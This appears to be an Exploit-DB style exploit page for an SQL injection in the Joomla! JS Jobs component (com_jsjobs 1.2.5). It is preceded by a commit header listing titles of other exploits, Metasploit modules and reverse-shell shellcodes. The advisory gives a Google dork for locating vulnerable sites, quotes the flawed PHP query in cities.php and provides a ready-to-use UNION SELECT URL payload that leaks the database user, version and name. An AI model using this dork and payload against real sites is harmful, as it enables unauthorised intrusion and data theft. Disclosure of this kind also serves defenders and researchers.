a32e028b88
17 changes to exploits/shellcodes VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow Linux - Use-After-Free Reads in show_numa_stats() WebKit - UXSS via XSLT and Nested Document Replacements Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution (Metasploit) ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit) ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit) Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit) BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting Cisco Adaptive Security Appliance - Path Traversal (Metasploit) UNA 10.0.0 RC1 - 'polyglot.php' Persistent Cross-Site Scripting Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticketreply.php' SQL Injection Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticket.php' Arbitrary File Deletion osTicket 1.12 - Persistent Cross-Site Scripting via File Upload osTicket 1.12 - Formula Injection osTicket 1.12 - Persistent Cross-Site Scripting Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes) Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes) Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes) Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes) Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)
40 lines
No EOL
1.6 KiB
Text
40 lines
No EOL
1.6 KiB
Text
#Exploit Title: Joomla! component com_jsjobs - SQL Injection
|
|
#Dork: inurl:"index.php?option=com_jsjobs"
|
|
#Date: 11.08.19
|
|
#Exploit Author: qw3rTyTy
|
|
#Vendor Homepage: https://www.joomsky.com/
|
|
#Software Link: https://www.joomsky.com/5/download/1
|
|
#Version: 1.2.5
|
|
#Tested on: Debian/nginx/joomla 3.9.0
|
|
#####################################
|
|
#Vulnerability details:
|
|
#####################################
|
|
Vulnerable code is in line 296 in file site/models/cities.php
|
|
|
|
291 function isCityExist($countryid, $stateid, $cityname){
|
|
292 if (!is_numeric($countryid))
|
|
293 return false;
|
|
294
|
|
295 $db = $this->getDBO();
|
|
296 $query = "SELECT id,name,latitude,longitude FROM `#__js_job_cities` WHERE countryid=" . $countryid . " AND LOWER(name) = '" . strtolower($cityname) . "'"; //!!!
|
|
297
|
|
298 if($stateid > 0){
|
|
299 $query .= " AND stateid=".$stateid;
|
|
300 }else{
|
|
301 $query .= " AND (stateid=0 OR stateid IS NULL)";
|
|
302 }
|
|
303
|
|
305 $db->setQuery($query);
|
|
306 $city = $db->loadObject();
|
|
307 if ($city != null)
|
|
308 return $city;
|
|
309 else
|
|
310 return false;
|
|
311 }
|
|
312
|
|
313 }
|
|
|
|
#####################################
|
|
#PoC:
|
|
#####################################
|
|
http://localhost/index.php?option=com_jsjobs&task=cities.savecity&citydata=%27%20UNION%20SELECT%20*%20FROM%20(SELECT%20user())%20AS%20a%20JOIN%20(SELECT%20version())%20as%20b%20JOIN%20(SELECT%20database())%20as%20c%20JOIN%20(SELECT%20%27woot%27)%20as%20d--%20,Canada |